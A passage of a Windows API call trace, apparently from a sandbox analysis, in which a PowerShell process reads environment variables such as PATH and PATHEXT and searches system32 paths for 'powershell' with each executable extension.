	[0762.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.675] CoTaskMemFree (pv=0x2434b0) 
	[0762.678] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0762.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.678] CoTaskMemFree (pv=0x2434b0) 
	[0762.679] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0762.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.680] CoTaskMemFree (pv=0x2434b0) 
	[0762.684] VirtualQuery (in: lpAddress=0x1c8dda10, lpBuffer=0x1c8de8d0, dwLength=0x30 | out: lpBuffer=0x1c8de8d0*(BaseAddress=0x1c8dd000, AllocationBase=0x1bf50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0762.685] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0762.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.685] CoTaskMemFree (pv=0x2434b0) 
	[0763.599] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0763.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.599] CoTaskMemFree (pv=0x2434b0) 
	[0763.599] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0763.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.599] CoTaskMemFree (pv=0x2434b0) 
	[0763.601] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0763.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.601] CoTaskMemFree (pv=0x2434b0) 
	[0763.605] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0763.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.605] CoTaskMemFree (pv=0x2434b0) 
	[0764.784] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0764.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.784] CoTaskMemFree (pv=0x2434b0) 
	[0764.787] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0764.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.787] CoTaskMemFree (pv=0x2434b0) 
	[0764.788] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0764.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.788] CoTaskMemFree (pv=0x2434b0) 
	[0764.791] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0764.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.791] CoTaskMemFree (pv=0x2434b0) 
	[0764.792] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0764.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.792] CoTaskMemFree (pv=0x2434b0) 
	[0764.794] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0764.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.794] CoTaskMemFree (pv=0x2434b0) 
	[0764.796] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0764.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.796] CoTaskMemFree (pv=0x2434b0) 
	[0766.820] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0766.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0766.821] CoTaskMemFree (pv=0x2434b0) 
	[0768.595] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0768.595] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0768.596] CoTaskMemFree (pv=0x2434b0) 
	[0768.599] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0768.599] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0768.599] CoTaskMemFree (pv=0x2434b0) 
	[0768.599] CoTaskMemAlloc (cb=0x128) returned 0x1b980cf0
	[0768.599] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b980cf0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0768.599] CoTaskMemFree (pv=0x1b980cf0) 
	[0769.684] CoTaskMemAlloc (cb=0x20e) returned 0x1b97aac0
	[0769.684] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b97aac0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0769.684] CoTaskMemFree (pv=0x1b97aac0) 
	[0769.688] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0769.689] SetErrorMode (uMode=0x1) returned 0x1
	[0769.692] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0770.808] SetErrorMode (uMode=0x1) returned 0x1
	[0770.809] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0770.810] SetErrorMode (uMode=0x1) returned 0x1
	[0770.810] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0770.818] SetErrorMode (uMode=0x1) returned 0x1
	[0770.820] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0770.820] SetErrorMode (uMode=0x1) returned 0x1
	[0770.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0770.828] SetErrorMode (uMode=0x1) returned 0x1
	[0770.829] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0770.830] SetErrorMode (uMode=0x1) returned 0x1
	[0770.830] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.481] SetErrorMode (uMode=0x1) returned 0x1
	[0771.482] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0771.482] SetErrorMode (uMode=0x1) returned 0x1
	[0771.482] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.508] SetErrorMode (uMode=0x1) returned 0x1
	[0771.509] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0771.509] SetErrorMode (uMode=0x1) returned 0x1
	[0771.510] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.519] SetErrorMode (uMode=0x1) returned 0x1
	[0771.520] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0771.520] SetErrorMode (uMode=0x1) returned 0x1
	[0771.520] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.529] SetErrorMode (uMode=0x1) returned 0x1
	[0771.530] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0771.530] SetErrorMode (uMode=0x1) returned 0x1
	[0771.530] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0773.124] SetErrorMode (uMode=0x1) returned 0x1
	[0773.126] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0773.126] SetErrorMode (uMode=0x1) returned 0x1
	[0773.126] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0773.137] SetErrorMode (uMode=0x1) returned 0x1
	[0773.138] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0773.139] SetErrorMode (uMode=0x1) returned 0x1
	[0773.139] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0773.147] SetErrorMode (uMode=0x1) returned 0x1
	[0773.148] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0773.149] SetErrorMode (uMode=0x1) returned 0x1
	[0773.149] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0775.112] SetErrorMode (uMode=0x1) returned 0x1
	[0775.113] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0775.113] SetErrorMode (uMode=0x1) returned 0x1
	[0775.113] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0775.121] SetErrorMode (uMode=0x1) returned 0x1
	[0775.123] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0775.123] SetErrorMode (uMode=0x1) returned 0x1
	[0775.123] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0775.131] SetErrorMode (uMode=0x1) returned 0x1
	[0775.132] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0775.132] SetErrorMode (uMode=0x1) returned 0x1
	[0775.132] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0775.142] SetErrorMode (uMode=0x1) returned 0x1
	[0775.143] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0775.143] SetErrorMode (uMode=0x1) returned 0x1
	[0775.143] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0775.151] SetErrorMode (uMode=0x1) returned 0x1
	[0777.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.009] SetErrorMode (uMode=0x1) returned 0x1
	[0777.009] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.010] SetErrorMode (uMode=0x1) returned 0x1
	[0777.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.010] SetErrorMode (uMode=0x1) returned 0x1
	[0777.010] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.010] SetErrorMode (uMode=0x1) returned 0x1
	[0777.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.011] SetErrorMode (uMode=0x1) returned 0x1
	[0777.011] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.011] SetErrorMode (uMode=0x1) returned 0x1
	[0777.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.012] SetErrorMode (uMode=0x1) returned 0x1
	[0777.012] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.012] SetErrorMode (uMode=0x1) returned 0x1
	[0777.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.012] SetErrorMode (uMode=0x1) returned 0x1
	[0777.012] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.013] SetErrorMode (uMode=0x1) returned 0x1
	[0777.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.013] SetErrorMode (uMode=0x1) returned 0x1
	[0777.013] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.016] SetErrorMode (uMode=0x1) returned 0x1
	[0777.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.017] SetErrorMode (uMode=0x1) returned 0x1
